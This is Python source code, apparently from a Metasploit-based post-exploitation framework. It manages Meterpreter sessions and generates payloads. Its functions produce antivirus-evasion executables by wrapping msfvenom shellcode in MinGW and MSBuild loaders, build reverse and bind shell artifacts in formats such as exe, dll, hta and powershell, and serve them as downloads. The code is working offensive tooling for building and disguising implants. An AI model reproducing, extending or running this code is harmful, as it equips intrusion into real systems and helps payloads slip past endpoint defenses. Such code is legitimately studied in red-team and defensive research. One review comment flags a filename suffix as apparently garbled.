def update(sessionid=None, action=None, sleep=0):
    """Switch a Meterpreter session's transport, or put the session to sleep.

    Args:
        sessionid: Meterpreter session id. ``None`` or a non-positive value
            is rejected up front with code 306.
        action: ``"next"`` / ``"prev"`` rotate the transport list;
            ``"sleep"`` detaches the session for ``sleep`` seconds. Any other
            value is treated as a failed switch (code 302).
        sleep: seconds to sleep; only read by the ``"sleep"`` action.

    Returns:
        A ``data_return`` context: 202 (transport switched) or 203 (session
        sleeping) on success; 302, 305 or 306 on failure.
    """
    if sessionid is None or sessionid <= 0:
        return data_return(306, TRANSPORT_MSG.get(306), {})

    # Sleep is handled first: it has its own success/failure codes and
    # reports the expected reconnect time to the operator.
    if action == "sleep":
        slept = RpcClient.call(Method.SessionMeterpreterTransportSleep, [sessionid, sleep])
        if not slept:
            return data_return(305, TRANSPORT_MSG.get(305), [])
        wake_at = time.time() + sleep
        Notice.send_warn(
            f'切换Session到休眠 SID:{sessionid} 重连时间: {time.strftime("%Y-%m-%d %H:%M:%S", time.localtime(wake_at))}'
        )
        return data_return(203, TRANSPORT_MSG.get(203), {})

    if action == "next":
        switched = RpcClient.call(Method.SessionMeterpreterTransportNext, [sessionid])
    elif action == "prev":
        switched = RpcClient.call(Method.SessionMeterpreterTransportPrev, [sessionid])
    else:
        # Unknown action: no RPC is issued, reported as a failed switch.
        switched = False

    if not switched:
        return data_return(302, TRANSPORT_MSG.get(302), [])
    Notice.send_info(f"切换传输完成 SID:{sessionid}")
    return data_return(202, TRANSPORT_MSG.get(202), {})
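def generate_bypass_exe(mname=None, opts=None):
    """Generate an AV-evasion EXE for payload ``mname`` using options ``opts``.

    ``opts`` is normalised *in place* (the caller's dict is mutated):

    * the host option that does not apply to the connection direction is
      dropped (``RHOST`` for reverse payloads, ``LHOST`` for bind payloads);
    * when ``OverrideRequestHost`` is ``True``, ``OverrideLHOST``/``OverrideLPORT``
      take the place of ``LHOST``/``LPORT`` and the flag is cleared;
    * for stageless meterpreter (``meterpreter_`` in the name) a bare
      ``EXTENSIONS=True`` becomes ``'stdapi'``;
    * ``Format`` is forced to ``hex`` — that is what the MinGW loader expects.

    Returns:
        The EXE bytes produced by ``Payload._create_payload_by_mingw``, or
        ``None`` when ``MSFModule.run`` returned no result.
    """
    # pop(key, None) replaces the old try/except-Exception-pass: the intent
    # is only "drop the key if present", and the broad except also hid any
    # unrelated error raised here.
    if mname.find("reverse") > 0:
        opts.pop('RHOST', None)
    elif mname.find("bind") > 0:
        opts.pop('LHOST', None)

    if opts.get('OverrideRequestHost') is True:
        opts["LHOST"] = opts['OverrideLHOST']
        opts["LPORT"] = opts['OverrideLPORT']
        # Cleared after folding the override into LHOST/LPORT; presumably so
        # the generated payload does not carry the override flag as well.
        opts['OverrideRequestHost'] = False
        Notice.send_warn("Payload包含OverrideRequestHost参数")
        Notice.send_warn(f"将LHOST 替换为 OverrideLHOST:{opts['OverrideLHOST']}")
        Notice.send_warn(f"将LPORT 替换为 OverrideLPORT:{opts['OverrideLPORT']}")

    if "meterpreter_" in mname and opts.get('EXTENSIONS') is True:
        opts['EXTENSIONS'] = 'stdapi'

    opts["Format"] = "hex"
    result = MSFModule.run(module_type="payload", mname=mname, opts=opts)
    if result is None:
        return None
    shellcode = base64.b64decode(result.get('payload'))
    return Payload._create_payload_by_mingw(mname=mname, shellcode=shellcode)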
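def generate_shellcode(mname=None, opts=None):
    """Generate raw shellcode (or a jar/py artifact) for payload ``mname``.

    ``opts`` is normalised *in place* (the caller's dict is mutated):

    * the host option that does not apply to the connection direction is
      dropped (``RHOST`` for reverse payloads, ``LHOST`` for bind payloads);
    * when ``OverrideRequestHost`` is ``True``, ``OverrideLHOST``/``OverrideLPORT``
      take the place of ``LHOST``/``LPORT``;
    * for stageless meterpreter (``meterpreter_`` in the name) a bare
      ``EXTENSIONS=True`` becomes ``'stdapi'``;
    * ``Format`` is chosen from the platform in the name: ``jar`` for java,
      ``py`` for python, ``raw`` otherwise.

    Returns:
        The decoded payload bytes, or ``None`` when ``MSFModule.run``
        returned no result.
    """
    # pop(key, None) replaces the old try/except-Exception-pass: the intent
    # is only "drop the key if present", and the broad except also hid any
    # unrelated error raised here.
    if mname.find("reverse") > 0:
        opts.pop('RHOST', None)
    elif mname.find("bind") > 0:
        opts.pop('LHOST', None)

    if opts.get('OverrideRequestHost') is True:
        opts["LHOST"] = opts['OverrideLHOST']
        opts["LPORT"] = opts['OverrideLPORT']
        # NOTE(review): unlike generate_bypass_exe/create, the flag is NOT
        # reset to False here, so the override option is still passed to
        # msfvenom. Confirm whether that is intended before aligning them.
        Notice.send_warn("Payload包含OverrideRequestHost参数")
        Notice.send_warn(
            f"将LHOST 替换为 OverrideLHOST:{opts['OverrideLHOST']}")
        Notice.send_warn(
            f"将LPORT 替换为 OverrideLPORT:{opts['OverrideLPORT']}")

    if "meterpreter_" in mname and opts.get('EXTENSIONS') is True:
        opts['EXTENSIONS'] = 'stdapi'

    # First matching platform marker wins; the order mirrors the original
    # if/elif chain. Everything not listed falls back to 'raw'.
    platform_formats = (
        ("windows", 'raw'),
        ("linux", 'raw'),
        ("java", 'jar'),
        ("python", 'py'),
        ("php", 'raw'),
    )
    opts["Format"] = 'raw'
    for marker, fmt in platform_formats:
        if marker in mname:
            opts["Format"] = fmt
            break

    result = MSFModule.run(module_type="payload", mname=mname, opts=opts)
    if result is None:
        return result
    return base64.b64decode(result.get('payload'))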
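def create(mname=None, opts=None):
    """Build a payload file for ``mname`` and return it as an HTTP download.

    ``opts`` is normalised *in place* exactly as in the sibling generators
    (direction-specific host key dropped, ``OverrideRequestHost`` folded into
    ``LHOST``/``LPORT`` and cleared, ``EXTENSIONS=True`` -> ``'stdapi'``).
    ``Format`` then selects the build path:

    * ``AUTO``: resolved from the platform in ``mname`` (exe-src / elf /
      jar / py / raw); an unknown platform returns code 306.
    * ``exe-diy`` / ``dll-diy`` / ``dll-mutex-diy`` / ``elf-diy``: hex
      shellcode wrapped by ``Payload._create_payload_with_loader``; the
      resulting file is read back from ``File.tmp_dir()``.
    * ``msbuild``: csharp payload wrapped by ``Payload._create_payload_use_msbuild``
      and read back from ``File.tmp_dir()``.
    * ``exe-src`` / ``exe-src-service``: hex shellcode compiled by the MinGW
      loader (service variant uses ``REVERSE_HEX_AS_SERVICE``).
    * anything else: msfvenom output returned as-is, named ``<epoch>.<suffix>``
      from a fixed suffix table.

    Other msfvenom options may also travel in ``opts`` (BadChars, Format,
    ForceEncode, Template, Platform, KeepTemplateWorking, NopSledSize,
    Iterations — from the original notes); they are passed through untouched.

    Returns:
        A ``data_return`` context on failure (305 when msfvenom yields nothing,
        306 on an unresolvable AUTO format); otherwise an ``HttpResponse``
        carrying the file bytes with ``Code``, ``Message`` and
        ``Content-Disposition`` headers.
    """
    # Clean up previously generated payload files first.
    Payload._destroy_old_files()

    # pop(key, None) replaces the old try/except-Exception-pass: the intent
    # is only "drop the key if present", and the broad except also hid any
    # unrelated error raised here.
    if mname.find("reverse") > 0:
        opts.pop('RHOST', None)
    elif mname.find("bind") > 0:
        opts.pop('LHOST', None)

    if opts.get('OverrideRequestHost') is True:
        opts["LHOST"] = opts['OverrideLHOST']
        opts["LPORT"] = opts['OverrideLPORT']
        # Cleared after folding the override into LHOST/LPORT; presumably so
        # the generated payload does not carry the override flag as well.
        opts['OverrideRequestHost'] = False
        Notice.send_warn("Payload包含OverrideRequestHost参数")
        Notice.send_warn(f"将LHOST 替换为 OverrideLHOST:{opts['OverrideLHOST']}")
        Notice.send_warn(f"将LPORT 替换为 OverrideLPORT:{opts['OverrideLPORT']}")

    if "meterpreter_" in mname and opts.get('EXTENSIONS') is True:
        opts['EXTENSIONS'] = 'stdapi'

    if opts.get("Format") == "AUTO":
        if "windows" in mname:
            opts["Format"] = 'exe-src'
        elif "linux" in mname:
            opts["Format"] = 'elf'
        elif "java" in mname:
            opts["Format"] = 'jar'
        elif "python" in mname:
            opts["Format"] = 'py'
        elif "php" in mname:
            opts["Format"] = 'raw'
        else:
            return data_return(306, Payload_MSG.get(306), {})

    if opts.get("Format") in ["exe-diy", "dll-diy", "dll-mutex-diy", "elf-diy"]:
        # Loader-wrapped formats: msfvenom produces hex shellcode, the loader
        # helper writes the final artifact into the tmp dir.
        tmp_type = opts.get("Format")
        opts["Format"] = "hex"
        result = MSFModule.run(module_type="payload", mname=mname, opts=opts)
        if result is None:
            return data_return(305, Payload_MSG.get(305), {})
        shellcode = base64.b64decode(result.get('payload'))
        filename = Payload._create_payload_with_loader(mname, shellcode, payload_type=tmp_type)
        # The on-disk path uses the helper's name; the download name may be
        # prefixed with the handler name below.
        payloadfile = os.path.join(File.tmp_dir(), filename)
        if opts.get("HandlerName") is not None:
            # NOTE(review): the suffix reads "_(unknown)" in the source as
            # received; it most likely was meant to be the generated
            # filename. Confirm against the repository before relying on it.
            filename = f"{opts.get('HandlerName')}_(unknown)"
        # Read the bytes ourselves instead of handing an open file object to
        # HttpResponse, so the handle is closed deterministically and the
        # response body is bytes like every other branch.
        with open(payloadfile, 'rb') as artifact:
            byteresult = artifact.read()
    elif opts.get("Format") == "msbuild":
        opts["Format"] = "csharp"
        result = MSFModule.run(module_type="payload", mname=mname, opts=opts)
        if result is None:
            return data_return(305, Payload_MSG.get(305), {})
        source = base64.b64decode(result.get('payload'))
        filename = Payload._create_payload_use_msbuild(mname, source)
        payloadfile = os.path.join(File.tmp_dir(), filename)
        with open(payloadfile, 'rb') as artifact:
            byteresult = artifact.read()
    elif opts.get("Format") == "exe-src":
        opts["Format"] = "hex"
        result = MSFModule.run(module_type="payload", mname=mname, opts=opts)
        if result is None:
            return data_return(305, Payload_MSG.get(305), {})
        shellcode = base64.b64decode(result.get('payload'))
        byteresult = Payload._create_payload_by_mingw(mname=mname, shellcode=shellcode)
        filename = "{}.exe".format(int(time.time()))
    elif opts.get("Format") == "exe-src-service":
        opts["Format"] = "hex"
        result = MSFModule.run(module_type="payload", mname=mname, opts=opts)
        if result is None:
            return data_return(305, Payload_MSG.get(305), {})
        shellcode = base64.b64decode(result.get('payload'))
        byteresult = Payload._create_payload_by_mingw(mname=mname, shellcode=shellcode,
                                                      payload_type="REVERSE_HEX_AS_SERVICE")
        filename = "{}.exe".format(int(time.time()))
    else:
        # Plain msfvenom output; a None suffix means "no extension".
        file_suffix = {
            "c": "c",
            "csharp": "cs",
            "exe": "exe",
            "exe-service": "exe",
            "powershell": "ps1",
            "psh-reflection": "ps1",
            "psh-cmd": "ps1",
            "hex": "hex",
            "hta-psh": "hta",
            "raw": "raw",
            "vba": "vba",
            "vbscript": "vbs",
            "elf": None,
            "elf-so": "so",
            "jar": "jar",
            "java": "java",
            "war": "war",
            "python": "py",
            "py": "py",
            "python-reflection": "py",
        }
        result = MSFModule.run(module_type="payload", mname=mname, opts=opts)
        if result is None:
            return data_return(305, Payload_MSG.get(305), {})
        byteresult = base64.b64decode(result.get('payload'))
        suffix = file_suffix.get(opts.get("Format"))
        if suffix is None:
            filename = "{}".format(int(time.time()))
        else:
            filename = "{}.{}".format(int(time.time()), suffix)

    response = HttpResponse(byteresult)
    response['Content-Type'] = 'application/octet-stream'
    response['Code'] = 200
    response['Message'] = parse.quote(Payload_MSG.get(201))
    # Percent-encode the stem so non-ASCII (e.g. Chinese) names survive the
    # header. The original passed 'utf-8' as quote()'s *safe* argument; since
    # those characters are never quoted anyway, safe='' is the same behaviour
    # stated explicitly. The extension is written as-is: for the suffix table
    # above it is always plain ASCII, but a HandlerName containing '.' ends
    # up in this part unencoded — keep that in mind if the frontend parses it.
    stem, ext = os.path.splitext(filename)
    response['Content-Disposition'] = f"{parse.quote(stem, safe='')}{ext}"
    return response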